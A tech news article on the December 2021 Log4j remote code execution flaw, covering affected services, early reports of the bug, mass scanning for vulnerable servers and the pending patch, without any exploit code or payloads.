Services and users using the Apache Log4j logging library on their servers are vulnerable to Remote Code Execution (RCE) attacks. This may also include large applications such as Steam and Apple iCloud. Cyber threat intelligence company Bad Packets writes that massive scanning is already underway for servers running Log4j, indicating that the vulnerability is already being actively exploited.
The Log4j logging library is developed by the Apache Foundation and used worldwide to track the status of and information about servers. This happens with all kinds of services, such as game servers for Minecraft and cloud services such as Apple iCloud or Steam. Important enterprise applications especially for large companies can also prove vulnerable.
The exploit enables RCE, which allows attackers to execute code without proper authorization. The exploit is very easy for attackers to perform, as they only need to log a specific line of code. This makes it a piece of cake for cybercriminals to take control of a server. A similar exploit was previously used in the major hack on the American credit company Equifax in 2017.
The bug was already found and reported in November by the Alibaba Cloud Security Team, Bleeping Computer writes. The Alibaba team also indicates that several Apache frameworks with default settings are also likely to be vulnerable. These include Apache Struts2, Apache Solr, Apache Druid, Apache Flink, among others.
Researchers and security companies have already noted that it is actively scanning for servers that use the vulnerable Log4j library. According to open source data security platform Lunasec, even more, applications will be vulnerable in the near future. Proofs-of-concept are frequently appearing on Twitter, showing that the exploit is particularly effective.
Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j (Java logging library) vulnerable to remote code execution (https://t.co/GgksMUlf94).
Query our API for "tags=CVE-2021-44228" for source IP addresses and other IOCs. #threatintel
— Bad Packets (@bad_packets) December 10, 2021
Proof of concept door @Twokilohertz
The Apache Foundation is already working on a patch, but the test version of this fix has been bypassed by researchers so far.
Catch up on more articles here
Follow us on Twitter here